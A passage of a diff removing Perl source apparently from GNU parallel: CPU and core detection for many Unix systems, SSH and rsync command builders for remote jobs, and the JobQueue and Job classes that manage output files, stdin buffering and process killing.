-	 `sysctl hw.ncpu 2>/dev/null | awk '{ print \$2 }'`);
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_freebsd {
-    # Returns:
-    #   Number of CPU cores on FreeBSD
-    #   undef if not FreeBSD
-    my $no_of_cores =
-	(`sysctl hw.ncpu 2>/dev/null | awk '{ print \$2 }'`
-	 or
-	 `sysctl -a hw  2>/dev/null | grep [^a-z]logicalcpu[^a-z] | awk '{ print \$2 }'`);
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_netbsd {
-    # Returns:
-    #   Number of physical CPUs on NetBSD
-    #   undef if not NetBSD
-    my $no_of_cpus = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_netbsd {
-    # Returns:
-    #   Number of CPU cores on NetBSD
-    #   undef if not NetBSD
-    my $no_of_cores = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_openbsd {
-    # Returns:
-    #   Number of physical CPUs on OpenBSD
-    #   undef if not OpenBSD
-    my $no_of_cpus = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_openbsd {
-    # Returns:
-    #   Number of CPU cores on OpenBSD
-    #   undef if not OpenBSD
-    my $no_of_cores = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_hurd {
-    # Returns:
-    #   Number of physical CPUs on HURD
-    #   undef if not HURD
-    my $no_of_cpus = `nproc`;
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_hurd {
-    # Returns:
-    #   Number of physical CPUs on HURD
-    #   undef if not HURD
-    my $no_of_cores = `nproc`;
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_darwin {
-    # Returns:
-    #   Number of physical CPUs on Mac Darwin
-    #   undef if not Mac Darwin
-    my $no_of_cpus =
-	(`sysctl -n hw.physicalcpu 2>/dev/null`
-	 or
-	 `sysctl -a hw 2>/dev/null | grep [^a-z]physicalcpu[^a-z] | awk '{ print \$2 }'`);
-    return $no_of_cpus;
-}
-
-sub no_of_cores_darwin {
-    # Returns:
-    #   Number of CPU cores on Mac Darwin
-    #   undef if not Mac Darwin
-    my $no_of_cores =
-	(`sysctl -n hw.logicalcpu 2>/dev/null`
-	 or
-	 `sysctl -a hw  2>/dev/null | grep [^a-z]logicalcpu[^a-z] | awk '{ print \$2 }'`);
-    return $no_of_cores;
-}
-
-sub no_of_cpus_solaris {
-    # Returns:
-    #   Number of physical CPUs on Solaris
-    #   undef if not Solaris
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    if(-x "/usr/sbin/prtconf") {
-        my @prtconf = `/usr/sbin/prtconf | grep cpu..instance`;
-        if($#prtconf >= 0) {
-            return $#prtconf +1;
-        }
-    }
-    return undef;
-}
-
-sub no_of_cores_solaris {
-    # Returns:
-    #   Number of CPU cores on Solaris
-    #   undef if not Solaris
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    if(-x "/usr/sbin/prtconf") {
-        my @prtconf = `/usr/sbin/prtconf | grep cpu..instance`;
-        if($#prtconf >= 0) {
-            return $#prtconf +1;
-        }
-    }
-    return undef;
-}
-
-sub no_of_cpus_aix {
-    # Returns:
-    #   Number of physical CPUs on AIX
-    #   undef if not AIX
-    my $no_of_cpus = 0;
-    if(-x "/usr/sbin/lscfg") {
-	open(my $in_fh, "-|", "/usr/sbin/lscfg -vs |grep proc | wc -l|tr -d ' '")
-	    || return undef;
-	$no_of_cpus = <$in_fh>;
-	chomp ($no_of_cpus);
-	close $in_fh;
-    }
-    return $no_of_cpus;
-}
-
-sub no_of_cores_aix {
-    # Returns:
-    #   Number of CPU cores on AIX
-    #   undef if not AIX
-    my $no_of_cores;
-    if(-x "/usr/bin/vmstat") {
-	open(my $in_fh, "-|", "/usr/bin/vmstat 1 1") || return undef;
-	while(<$in_fh>) {
-	    /lcpu=([0-9]*) / and $no_of_cores = $1;
-	}
-	close $in_fh;
-    }
-    return $no_of_cores;
-}
-
-sub no_of_cpus_hpux {
-    # Returns:
-    #   Number of physical CPUs on HP-UX
-    #   undef if not HP-UX
-    my $no_of_cpus =
-        (`/usr/bin/mpsched -s 2>&1 | grep 'Locality Domain Count' | awk '{ print \$4 }'`);
-    return $no_of_cpus;
-}
-
-sub no_of_cores_hpux {
-    # Returns:
-    #   Number of CPU cores on HP-UX
-    #   undef if not HP-UX
-    my $no_of_cores =
-        (`/usr/bin/mpsched -s 2>&1 | grep 'Processor Count' | awk '{ print \$3 }'`);
-    return $no_of_cores;
-}
-
-sub no_of_cpus_qnx {
-    # Returns:
-    #   Number of physical CPUs on QNX
-    #   undef if not QNX
-    # BUG: It is now known how to calculate this.
-    my $no_of_cpus = 0;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_qnx {
-    # Returns:
-    #   Number of CPU cores on QNX
-    #   undef if not QNX
-    # BUG: It is now known how to calculate this.
-    my $no_of_cores = 0;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_openserver {
-    # Returns:
-    #   Number of physical CPUs on SCO OpenServer
-    #   undef if not SCO OpenServer
-    my $no_of_cpus = 0;
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    return $no_of_cpus;
-}
-
-sub no_of_cores_openserver {
-    # Returns:
-    #   Number of CPU cores on SCO OpenServer
-    #   undef if not SCO OpenServer
-    my $no_of_cores = 0;
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    return $no_of_cores;
-}
-
-sub no_of_cpus_irix {
-    # Returns:
-    #   Number of physical CPUs on IRIX
-    #   undef if not IRIX
-    my $no_of_cpus = `hinv | grep HZ | grep Processor | awk '{print \$1}'`;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_irix {
-    # Returns:
-    #   Number of CPU cores on IRIX
-    #   undef if not IRIX
-    my $no_of_cores = `hinv | grep HZ | grep Processor | awk '{print \$1}'`;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_tru64 {
-    # Returns:
-    #   Number of physical CPUs on Tru64
-    #   undef if not Tru64
-    my $no_of_cpus = `sizer -pr`;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_tru64 {
-    # Returns:
-    #   Number of CPU cores on Tru64
-    #   undef if not Tru64
-    my $no_of_cores = `sizer -pr`;
-    return $no_of_cores;
-}
-
-sub sshcommand {
-    my $self = shift;
-    if (not defined $self->{'sshcommand'}) {
-        $self->sshcommand_of_sshlogin();
-    }
-    return $self->{'sshcommand'};
-}
-
-sub serverlogin {
-    my $self = shift;
-    if (not defined $self->{'serverlogin'}) {
-        $self->sshcommand_of_sshlogin();
-    }
-    return $self->{'serverlogin'};
-}
-
-sub sshcommand_of_sshlogin {
-    # 'server' -> ('ssh -S /tmp/parallel-ssh-RANDOM/host-','server')
-    # 'user@server' -> ('ssh','user@server')
-    # 'myssh user@server' -> ('myssh','user@server')
-    # 'myssh -l user server' -> ('myssh -l user','server')
-    # '/usr/bin/myssh -l user server' -> ('/usr/bin/myssh -l user','server')
-    # Returns:
-    #   sshcommand - defaults to 'ssh'
-    #   login@host
-    my $self = shift;
-    my ($sshcmd, $serverlogin);
-    if($self->{'string'} =~ /(.+) (\S+)$/) {
-        # Own ssh command
-        $sshcmd = $1; $serverlogin = $2;
-    } else {
-        # Normal ssh
-        if($opt::controlmaster) {
-            # Use control_path to make ssh faster
-            my $control_path = $self->control_path_dir()."/ssh-%r@%h:%p";
-            $sshcmd = "ssh -S ".$control_path;
-            $serverlogin = $self->{'string'};
-            if(not $self->{'control_path'}{$control_path}++) {
-                # Master is not running for this control_path
-                # Start it
-                my $pid = fork();
-                if($pid) {
-                    $Global::sshmaster{$pid} ||= 1;
-                } else {
-		    $SIG{'TERM'} = undef;
-                    # Ignore the 'foo' being printed
-                    open(STDOUT,">","/dev/null");
-                    # OpenSSH_3.6.1p2 gives 'tcgetattr: Invalid argument' with -tt
-                    # STDERR >/dev/null to ignore "process_mux_new_session: tcgetattr: Invalid argument"
-                    open(STDERR,">","/dev/null");
-                    open(STDIN,"<","/dev/null");
-                    # Run a sleep that outputs data, so it will discover if the ssh connection closes.
-                    my $sleep = ::shell_quote_scalar('$|=1;while(1){sleep 1;print "foo\n"}');
-                    my @master = ("ssh", "-tt", "-MTS", $control_path, $serverlogin, "perl", "-e", $sleep);
-                    exec(@master);
-                }
-            }
-        } else {
-            $sshcmd = "ssh"; $serverlogin = $self->{'string'};
-        }
-    }
-    $self->{'sshcommand'} = $sshcmd;
-    $self->{'serverlogin'} = $serverlogin;
-}
-
-sub control_path_dir {
-    # Returns:
-    #   path to directory
-    my $self = shift;
-    if(not defined $self->{'control_path_dir'}) {
-        -e $ENV{'HOME'}."/.parallel" or mkdir $ENV{'HOME'}."/.parallel";
-        -e $ENV{'HOME'}."/.parallel/tmp" or mkdir $ENV{'HOME'}."/.parallel/tmp";
-        $self->{'control_path_dir'} =
-	    File::Temp::tempdir($ENV{'HOME'}
-				. "/.parallel/tmp/control_path_dir-XXXX",
-				CLEANUP => 1);
-    }
-    return $self->{'control_path_dir'};
-}
-
-sub rsync_transfer_cmd {
-    # Command to run to transfer a file
-    # Input:
-    #   $file = filename of file to transfer
-    #   $workdir = destination dir
-    # Returns:
-    #   $cmd = rsync command to run to transfer $file ("" if unreadable)
-    my $self = shift;
-    my $file = shift;
-    my $workdir = shift;
-    if(not -r $file) {
-	::warning($file, " is not readable and will not be transferred.\n");
-	return "true";
-    }
-    my $rsync_destdir;
-    if($file =~ m:^/:) {
-	# rsync /foo/bar /
-	$rsync_destdir = "/";
-    } else {
-	$rsync_destdir = ::shell_quote_file($workdir);
-    }
-    $file = ::shell_quote_file($file);
-    my $sshcmd = $self->sshcommand();
-    my $rsync_opt = "-rlDzR -e" . ::shell_quote_scalar($sshcmd);
-    my $serverlogin = $self->serverlogin();
-    # Make dir if it does not exist
-    return "( $sshcmd $serverlogin mkdir -p $rsync_destdir;" .
-	rsync()." $rsync_opt $file $serverlogin:$rsync_destdir )";
-}
-
-sub cleanup_cmd {
-    # Command to run to remove the remote file
-    # Input:
-    #   $file = filename to remove
-    #   $workdir = destination dir
-    # Returns:
-    #   $cmd = ssh command to run to remove $file and empty parent dirs
-    my $self = shift;
-    my $file = shift;
-    my $workdir = shift;
-    my $f = $file;
-    if($f =~ m:/\./:) {
-	# foo/bar/./baz/quux => workdir/baz/quux
-	# /foo/bar/./baz/quux => workdir/baz/quux
-	$f =~ s:.*/\./:$workdir/:;
-    } elsif($f =~ m:^[^/]:) {
-	# foo/bar => workdir/foo/bar
-	$f = $workdir."/".$f;
-    }
-    my @subdirs = split m:/:, ::dirname($f);
-    my @rmdir;
-    my $dir = "";
-    for(@subdirs) {
-	$dir .= $_."/";
-	unshift @rmdir, ::shell_quote_file($dir);
-    }
-    my $rmdir = @rmdir ? "rmdir @rmdir 2>/dev/null;" : "";
-    if(defined $opt::workdir and $opt::workdir eq "...") {
-	$rmdir .= "rm -rf " . ::shell_quote_file($workdir).';';
-    }
-
-    $f = ::shell_quote_file($f);
-    my $sshcmd = $self->sshcommand();
-    my $serverlogin = $self->serverlogin();
-    return "$sshcmd $serverlogin ".::shell_quote_scalar("(rm -f $f; $rmdir)");
-}
-
-{
-    my $rsync;
-
-    sub rsync {
-	# rsync 3.1.x uses protocol 31 which is unsupported by 2.5.7.
-	# If the version >= 3.1.0: downgrade to protocol 30
-	if(not $rsync) {
-	    my @out = `rsync --version`;
-	    for (@out) {
-		if(/version (\d+.\d+)(.\d+)?/) {
-		    if($1 >= 3.1) {
-			# Version 3.1.0 or later: Downgrade to protocol 30
-			$rsync = "rsync --protocol 30";
-		    } else {
-			$rsync = "rsync";
-		    }
-		}
-	    }
-	    $rsync or ::die_bug("Cannot figure out version of rsync: @out");
-	}
-	return $rsync;
-    }
-}
-
-
-package JobQueue;
-
-sub new {
-    my $class = shift;
-    my $commandref = shift;
-    my $read_from = shift;
-    my $context_replace = shift;
-    my $max_number_of_args = shift;
-    my $return_files = shift;
-    my $commandlinequeue = CommandLineQueue->new
-	($commandref, $read_from, $context_replace, $max_number_of_args,
-	 $return_files);
-    my @unget = ();
-    return bless {
-        'unget' => \@unget,
-        'commandlinequeue' => $commandlinequeue,
-        'total_jobs' => undef,
-    }, ref($class) || $class;
-}
-
-sub get {
-    my $self = shift;
-
-    if(@{$self->{'unget'}}) {
-        my $job = shift @{$self->{'unget'}};
-        return ($job);
-    } else {
-        my $commandline = $self->{'commandlinequeue'}->get();
-        if(defined $commandline) {
-            my $job = Job->new($commandline);
-            return $job;
-        } else {
-            return undef;
-        }
-    }
-}
-
-sub unget {
-    my $self = shift;
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @{$self->{'unget'}})
-	&& $self->{'commandlinequeue'}->empty();
-    ::debug("run", "JobQueue->empty $empty ");
-    return $empty;
-}
-
-sub total_jobs {
-    my $self = shift;
-    if(not defined $self->{'total_jobs'}) {
-        my $job;
-        my @queue;
-	my $start = time;
-        while($job = $self->get()) {
-	    if(time - $start > 10) {
-		::warning("Reading all arguments takes longer than 10 seconds.\n");
-		$opt::eta && ::warning("Consider removing --eta.\n");
-		$opt::bar && ::warning("Consider removing --bar.\n");
-		last;
-	    }
-            push @queue, $job;
-        }
-        while($job = $self->get()) {
-            push @queue, $job;
-        }
-
-        $self->unget(@queue);
-        $self->{'total_jobs'} = $#queue+1;
-    }
-    return $self->{'total_jobs'};
-}
-
-sub next_seq {
-    my $self = shift;
-
-    return $self->{'commandlinequeue'}->seq();
-}
-
-sub quote_args {
-    my $self = shift;
-    return $self->{'commandlinequeue'}->quote_args();
-}
-
-
-package Job;
-
-sub new {
-    my $class = shift;
-    my $commandlineref = shift;
-    return bless {
-        'commandline' => $commandlineref, # CommandLine object
-        'workdir' => undef, # --workdir
-        'stdin' => undef, # filehandle for stdin (used for --pipe)
-	# filename for writing stdout to (used for --files)
-        'remaining' => "", # remaining data not sent to stdin (used for --pipe)
-	'datawritten' => 0, # amount of data sent via stdin (used for --pipe)
-        'transfersize' => 0, # size of files using --transfer
-        'returnsize' => 0, # size of files using --return
-        'pid' => undef,
-        # hash of { SSHLogins => number of times the command failed there }
-        'failed' => undef,
-        'sshlogin' => undef,
-        # The commandline wrapped with rsync and ssh
-        'sshlogin_wrap' => undef,
-        'exitstatus' => undef,
-        'exitsignal' => undef,
-	# Timestamp for timeout if any
-	'timeout' => undef,
-	'virgin' => 1,
-    }, ref($class) || $class;
-}
-
-sub replaced {
-    my $self = shift;
-    $self->{'commandline'} or ::die_bug("commandline empty");
-    return $self->{'commandline'}->replaced();
-}
-
-sub seq {
-    my $self = shift;
-    return $self->{'commandline'}->seq();
-}
-
-sub slot {
-    my $self = shift;
-    return $self->{'commandline'}->slot();
-}
-
-{
-    my($cattail);
-
-    sub cattail {
-	# Returns:
-	#   $cattail = perl program for: cattail "decompress program" writerpid [file_to_decompress or stdin] [file_to_unlink]
-	if(not $cattail) {
-	    $cattail = q{
-		# cat followed by tail.
-		# If $writerpid dead: finish after this round
-		use Fcntl;
-
-		$|=1;
-
-		my ($cmd, $writerpid, $read_file, $unlink_file) = @ARGV;
-		if($read_file) {
-		    open(IN,"<",$read_file) || die("cattail: Cannot open $read_file");
-		} else {
-		    *IN = *STDIN;
-		}
-
-		my $flags;
-		fcntl(IN, F_GETFL, $flags) || die $!; # Get the current flags on the filehandle
-		$flags |= O_NONBLOCK; # Add non-blocking to the flags
-		fcntl(IN, F_SETFL, $flags) || die $!; # Set the flags on the filehandle
-		open(OUT,"|-",$cmd) || die("cattail: Cannot run $cmd");
-
-		while(1) {
-		    # clear EOF
-		    seek(IN,0,1);
-		    my $writer_running = kill 0, $writerpid;
-		    $read = sysread(IN,$buf,32768);
-		    if($read) {
-			# We can unlink the file now: The writer has written something
-			-e $unlink_file and unlink $unlink_file;
-			# Blocking print
-			while($buf) {
-			    my $bytes_written = syswrite(OUT,$buf);
-			    # syswrite may be interrupted by SIGHUP
-			    substr($buf,0,$bytes_written) = "";
-			}
-			# Something printed: Wait less next time
-			$sleep /= 2;
-		    } else {
-			if(eof(IN) and not $writer_running) {
-			    # Writer dead: There will never be more to read => exit
-			    exit;
-			}
-			# TODO This could probably be done more efficiently using select(2)
-			# Nothing read: Wait longer before next read
-			# Up to 30 milliseconds
-			$sleep = ($sleep < 30) ? ($sleep * 1.001 + 0.01) : ($sleep);
-			usleep($sleep);
-		    }
-		}
-
-		sub usleep {
-		    # Sleep this many milliseconds.
-		    my $secs = shift;
-		    select(undef, undef, undef, $secs/1000);
-		}
-	    };
-	    $cattail =~ s/#.*//mg;
-	    $cattail =~ s/\s+/ /g;
-	}
-	return $cattail;
-    }
-}
-
-sub openoutputfiles {
-    # Open files for STDOUT and STDERR
-    # Set file handles in $self->fh
-    my $self = shift;
-    my ($outfhw, $errfhw, $outname, $errname);
-    if($opt::results) {
-	my $args_as_dirname = $self->{'commandline'}->args_as_dirname();
-	# Output in: prefix/name1/val1/name2/val2/stdout
-	my $dir = $opt::results."/".$args_as_dirname;
-	if(eval{ File::Path::mkpath($dir); }) {
-	    # OK
-	} else {
-	    # mkpath failed: Argument probably too long.
-	    # Set $Global::max_file_length, which will keep the individual
-	    # dir names shorter than the max length
-	    max_file_name_length($opt::results);
-	    $args_as_dirname = $self->{'commandline'}->args_as_dirname();
-	    # prefix/name1/val1/name2/val2/
-	    $dir = $opt::results."/".$args_as_dirname;
-	    File::Path::mkpath($dir);
-	}
-	# prefix/name1/val1/name2/val2/stdout
-	$outname = "$dir/stdout";
-	if(not open($outfhw, "+>", $outname)) {
-	    ::error("Cannot write to `$outname'.\n");
-	    ::wait_and_exit(255);
-	}
-	# prefix/name1/val1/name2/val2/stderr
-	$errname = "$dir/stderr";
-	if(not open($errfhw, "+>", $errname)) {
-	    ::error("Cannot write to `$errname'.\n");
-	    ::wait_and_exit(255);
-	}
-	$self->set_fh(1,"unlink","");
-	$self->set_fh(2,"unlink","");
-    } elsif(not $opt::ungroup) {
-	# To group we create temporary files for STDOUT and STDERR
-	# To avoid the cleanup unlink the files immediately (but keep them open)
-	if(@Global::tee_jobs) {
-	    # files must be removed when the tee is done
-	} elsif($opt::files) {
-	    ($outfhw, $outname) = ::tmpfile(SUFFIX => ".par");
-	    ($errfhw, $errname) = ::tmpfile(SUFFIX => ".par");
-	    # --files => only remove stderr
-	    $self->set_fh(1,"unlink","");
-	    $self->set_fh(2,"unlink",$errname);
-	} else {
-	    ($outfhw, $outname) = ::tmpfile(SUFFIX => ".par");
-	    ($errfhw, $errname) = ::tmpfile(SUFFIX => ".par");
-	    $self->set_fh(1,"unlink",$outname);
-	    $self->set_fh(2,"unlink",$errname);
-	}
-    } else {
-	# --ungroup
-	open($outfhw,">&",$Global::fd{1}) || die;
-	open($errfhw,">&",$Global::fd{2}) || die;
-	# File name must be empty as it will otherwise be printed
-	$outname = "";
-	$errname = "";
-	$self->set_fh(1,"unlink",$outname);
-	$self->set_fh(2,"unlink",$errname);
-    }
-    # Set writing FD
-    $self->set_fh(1,'w',$outfhw);
-    $self->set_fh(2,'w',$errfhw);
-    $self->set_fh(1,'name',$outname);
-    $self->set_fh(2,'name',$errname);
-    if($opt::compress) {
-	# Send stdout to stdin for $opt::compress_program(1)
-	# Send stderr to stdin for $opt::compress_program(2)
-	# cattail get pid:  $pid = $self->fh($fdno,'rpid');
-	my $cattail = cattail();
-	for my $fdno (1,2) {
-	    my $wpid = open(my $fdw,"|-","$opt::compress_program >>".
-			    $self->fh($fdno,'name')) || die $?;
-	    $self->set_fh($fdno,'w',$fdw);
-	    $self->set_fh($fdno,'wpid',$wpid);
-	    my $rpid = open(my $fdr, "-|", "perl", "-e", $cattail,
-			    $opt::decompress_program, $wpid,
-			    $self->fh($fdno,'name'),$self->fh($fdno,'unlink')) || die $?;
-	    $self->set_fh($fdno,'r',$fdr);
-	    $self->set_fh($fdno,'rpid',$rpid);
-	}
-    } elsif(not $opt::ungroup) {
-	# Set reading FD if using --group (--ungroup does not need)
-	for my $fdno (1,2) {
-	    # Re-open the file for reading
-	    # so fdw can be closed seperately
-	    # and fdr can be seeked seperately (for --line-buffer)
-	    open(my $fdr,"<", $self->fh($fdno,'name')) ||
-		::die_bug("fdr: Cannot open ".$self->fh($fdno,'name'));
-	    $self->set_fh($fdno,'r',$fdr);
-            # Unlink if required
-	    $Global::debug or unlink $self->fh($fdno,"unlink");
-	}
-    }
-    if($opt::linebuffer) {
-	# Set non-blocking when using --linebuffer
-	$Global::use{"Fcntl"} ||= eval "use Fcntl qw(:DEFAULT :flock); 1;";
-	for my $fdno (1,2) {
-	    my $fdr = $self->fh($fdno,'r');
-	    my $flags;
-	    fcntl($fdr, &F_GETFL, $flags) || die $!; # Get the current flags on the filehandle
-	    $flags |= &O_NONBLOCK; # Add non-blocking to the flags
-	    fcntl($fdr, &F_SETFL, $flags) || die $!; # Set the flags on the filehandle
-	}
-    }
-}
-
-sub max_file_name_length {
-    # Figure out the max length of a subdir
-    # TODO and the max total length
-    # Ext4 = 255,130816
-    my $testdir = shift;
-
-    my $upper = 8_000_000;
-    my $len = 8;
-    my $dir="x"x$len;
-    do {
-	rmdir($testdir."/".$dir);
-	$len *= 16;
-	$dir="x"x$len;
-    } while (mkdir $testdir."/".$dir);
-    # Then search for the actual max length between $len/16 and $len
-    my $min = $len/16;
-    my $max = $len;
-    while($max-$min > 5) {
-	# If we are within 5 chars of the exact value:
-	# it is not worth the extra time to find the exact value
-	my $test = int(($min+$max)/2);
-	$dir="x"x$test;
-	if(mkdir $testdir."/".$dir) {
-	    rmdir($testdir."/".$dir);
-	    $min = $test;
-	} else {
-	    $max = $test;
-	}
-    }
-    $Global::max_file_length = $min;
-    return $min;
-}
-
-sub set_fh {
-    # Set file handle
-    my ($self, $fd_no, $key, $fh) = @_;
-    $self->{'fd'}{$fd_no,$key} = $fh;
-}
-
-sub fh {
-    # Get file handle
-    my ($self, $fd_no, $key) = @_;
-    return $self->{'fd'}{$fd_no,$key};
-}
-
-sub write {
-    my $self = shift;
-    my $remaining_ref = shift;
-    my $stdin_fh = $self->fh(0,"w");
-    syswrite($stdin_fh,$$remaining_ref);
-}
-
-sub set_stdin_buffer {
-    # Copy stdin buffer from $block_ref up to $endpos
-    # Prepend with $header_ref
-    # Remove $recstart and $recend if needed
-    # Input:
-    #   $header_ref = ref to $header to prepend
-    #   $block_ref = ref to $block to pass on
-    #   $endpos = length of $block to pass on
-    #   $recstart = --recstart regexp
-    #   $recend = --recend regexp
-    # Returns:
-    #   N/A
-    my $self = shift;
-    my ($header_ref,$block_ref,$endpos,$recstart,$recend) = @_;
-    $self->{'stdin_buffer'} = ($self->virgin() ? $$header_ref : "").substr($$block_ref,0,$endpos);
-    if($opt::remove_rec_sep) {
-	remove_rec_sep(\$self->{'stdin_buffer'},$recstart,$recend);
-    }
-    $self->{'stdin_buffer_length'} = length $self->{'stdin_buffer'};
-    $self->{'stdin_buffer_pos'} = 0;
-}
-
-sub stdin_buffer_length {
-    my $self = shift;
-    return $self->{'stdin_buffer_length'};
-}
-
-sub remove_rec_sep {
-    my ($block_ref,$recstart,$recend) = @_;
-    # Remove record separator
-    $$block_ref =~ s/$recend$recstart//gos;
-    $$block_ref =~ s/^$recstart//os;
-    $$block_ref =~ s/$recend$//os;
-}
-
-sub non_block_write {
-    my $self = shift;
-    my $something_written = 0;
-    use POSIX qw(:errno_h);
-#    use Fcntl;
-#    my $flags = '';
-    for my $buf (substr($self->{'stdin_buffer'},$self->{'stdin_buffer_pos'})) {
-	my $in = $self->fh(0,"w");
-#	fcntl($in, F_GETFL, $flags)
-#	    or die "Couldn't get flags for HANDLE : $!\n";
-#	$flags |= O_NONBLOCK;
-#	fcntl($in, F_SETFL, $flags)
-#	    or die "Couldn't set flags for HANDLE: $!\n";
-	my $rv = syswrite($in, $buf);
-	if (!defined($rv) && $! == EAGAIN) {
-	    # would block
-	    $something_written = 0;
-	} elsif ($self->{'stdin_buffer_pos'}+$rv != $self->{'stdin_buffer_length'}) {
-	    # incomplete write
-	    # Remove the written part
-	    $self->{'stdin_buffer_pos'} += $rv;
-	    $something_written = $rv;
-	} else {
-	    # successfully wrote everything
-	    my $a="";
-	    $self->set_stdin_buffer(\$a,\$a,"","");
-	    $something_written = $rv;
-	}
-    }
-
-    ::debug("pipe", "Non-block: ", $something_written);
-    return $something_written;
-}
-
-
-sub virgin {
-    my $self = shift;
-    return $self->{'virgin'};
-}
-
-sub set_virgin {
-    my $self = shift;
-    $self->{'virgin'} = shift;
-}
-
-sub pid {
-    my $self = shift;
-    return $self->{'pid'};
-}
-
-sub set_pid {
-    my $self = shift;
-    $self->{'pid'} = shift;
-}
-
-sub starttime {
-    # Returns:
-    #   UNIX-timestamp this job started
-    my $self = shift;
-    return sprintf("%.3f",$self->{'starttime'});
-}
-
-sub set_starttime {
-    my $self = shift;
-    my $starttime = shift || ::now();
-    $self->{'starttime'} = $starttime;
-}
-
-sub runtime {
-    # Returns:
-    #   Run time in seconds
-    my $self = shift;
-    return sprintf("%.3f",int(($self->endtime() - $self->starttime())*1000)/1000);
-}
-
-sub endtime {
-    # Returns:
-    #   UNIX-timestamp this job ended
-    #   0 if not ended yet
-    my $self = shift;
-    return ($self->{'endtime'} || 0);
-}
-
-sub set_endtime {
-    my $self = shift;
-    my $endtime = shift;
-    $self->{'endtime'} = $endtime;
-}
-
-sub timedout {
-    # Is the job timedout?
-    # Input:
-    #   $delta_time = time that the job may run
-    # Returns:
-    #   True or false
-    my $self = shift;
-    my $delta_time = shift;
-    return time > $self->{'starttime'} + $delta_time;
-}
-
-sub kill {
-    # Kill the job.
-    # Send the signals to (grand)*children and pid.
-    # If no signals: TERM TERM KILL
-    # Wait 200 ms after each TERM.
-    # Input:
-    #   @signals = signals to send
-    my $self = shift;
-    my @signals = @_;
-    my @family_pids = $self->family_pids();
-    # Record this jobs as failed
-    $self->set_exitstatus(-1);
-    # Send two TERMs to give time to clean up
-    ::debug("run", "Kill seq ", $self->seq(), "\n");
-    my @send_signals = @signals || ("TERM", "TERM", "KILL");
-    for my $signal (@send_signals) {
-	my $alive = 0;
-	for my $pid (@family_pids) {
-	    if(kill 0, $pid) {
-		# The job still running
-		kill $signal, $pid;
-		$alive = 1;
-	    }
-	}
-	# If a signal was given as input, do not do the sleep below
-	@signals and next;
-
-	if($signal eq "TERM" and $alive) {
-	    # Wait up to 200 ms between TERMs - but only if any pids are alive
-	    my $sleep = 1;
-	    for (my $sleepsum = 0; kill 0, $family_pids[0] and $sleepsum < 200;
-		 $sleepsum += $sleep) {
-		$sleep = ::reap_usleep($sleep);
-	    }
-	}
-    }
-}
-
-sub family_pids {
-    # Find the pids with this->pid as (grand)*parent
-    # Returns:
-    #   @pids = pids of (grand)*children
-    my $self = shift;
-    my $pid = $self->pid();
-    my @pids;
-
-    my ($children_of_ref, $parent_of_ref, $name_of_ref) = ::pid_table();
-
-    my @more = ($pid);
-    # While more (grand)*children
-    while(@more) {
-	my @m;
-	push @pids, @more;
-	for my $parent (@more) {
-	    if($children_of_ref->{$parent}) {
-		# add the children of this parent
-		push @m, @{$children_of_ref->{$parent}};
-	    }
-	}
-	@more = @m;
-    }
-    return (@pids);
-}
-
-sub failed {
-    # return number of times failed for this $sshlogin
-    # Input:
-    #   $sshlogin
-    # Returns:
-    #   Number of times failed for $sshlogin
-    my $self = shift;
-    my $sshlogin = shift;
-    return $self->{'failed'}{$sshlogin};
-}
-
-sub failed_here {
-    # return number of times failed for the current $sshlogin
-    # Returns:
-    #   Number of times failed for this sshlogin
-    my $self = shift;
-    return $self->{'failed'}{$self->sshlogin()};
-}
-
-sub add_failed {
-    # increase the number of times failed for this $sshlogin
-    my $self = shift;
-    my $sshlogin = shift;
-    $self->{'failed'}{$sshlogin}++;
-}
-
-sub add_failed_here {
-    # increase the number of times failed for the current $sshlogin
-    my $self = shift;
-    $self->{'failed'}{$self->sshlogin()}++;
-}
-
-sub reset_failed {
-    # increase the number of times failed for this $sshlogin
-    my $self = shift;
-    my $sshlogin = shift;
-    delete $self->{'failed'}{$sshlogin};
-}
-
-sub reset_failed_here {
-    # increase the number of times failed for this $sshlogin
-    my $self = shift;
-    delete $self->{'failed'}{$self->sshlogin()};
-}
-
-sub min_failed {
-    # Returns:
-    #   the number of sshlogins this command has failed on
-    #   the minimal number of times this command has failed
-    my $self = shift;
-    my $min_failures =
-	::min(map { $self->{'failed'}{$_} } keys %{$self->{'failed'}});
-    my $number_of_sshlogins_failed_on = scalar keys %{$self->{'failed'}};
-    return ($number_of_sshlogins_failed_on,$min_failures);
-}
-
-sub total_failed {
-    # Returns:
-    #   $total_failures = the number of times this command has failed
-    my $self = shift;
-    my $total_failures = 0;
-    for (values %{$self->{'failed'}}) {
-	$total_failures += $_;
-    }
-    return $total_failures;
-}
-
-sub wrapped {
-    # Wrap command with:
-    # * --shellquote
-    # * --nice
-    # * --cat
-    # * --fifo
-    # * --sshlogin
-    # * --pipepart (@Global::cat_partials)
-    # * --pipe
